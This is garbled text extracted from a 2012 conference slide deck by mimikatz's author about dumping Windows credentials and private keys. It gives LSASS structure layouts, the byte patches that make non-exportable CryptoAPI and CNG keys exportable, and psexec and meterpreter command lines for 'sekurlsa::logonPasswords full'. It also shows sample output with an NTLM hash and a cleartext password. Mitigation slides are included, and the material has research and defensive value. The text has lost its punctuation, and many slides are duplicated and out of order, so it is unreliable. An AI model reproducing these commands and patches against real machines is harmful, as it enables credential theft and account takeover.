When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsamemo
Security Packages
Protection Keys
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionListlsasrvLogonSessionListCount
LIST_ENTRYULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKeylsasrvg_pRandomKey
DESx lsasrvg_pDESXKeylsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsamemo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz
mimikatz privilegedebugDemande dACTIVATION du privilegravege SeDebugPrivilege OK
mimikatz sekurlsalogonPasswords full
Authentification Id 0234870Package dauthentification NTLMUtilisateur principal Gentil KiwiDomaine dauthentification vm-w8-rp-x
msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a
kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234
livessp nt (LUID KO)
mimikatz sekurlsawhat we can do
Basicsndash No physical access to computer (first step to pass the hash then pass the pass)ndash No admin rights system rights debug privileges (hellip)ndash Disable local admin accountsndash Strong passwords (haha it was a joke so useless )ndash For privileged account network login instead of interactive (when possible)ndash Audit pass the hash keeps traces and can lock accountsndash No admin rights system rights debug privileges even VIPndash Use separated network (or forest) for privileged tasks
More in depthndash Force strong authentication (SmartCard amp Token) $ eurondash Short validity for Kerberos ticketsndash No delegationndash Disable NTLM (available with NT6)ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows)bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys ))ndash Let opportunities to stop retro compatibilityndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37
mimikatz cryptowhat is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeysbull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Exportbull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patchbull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38
mod_mimikatz_crypto
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
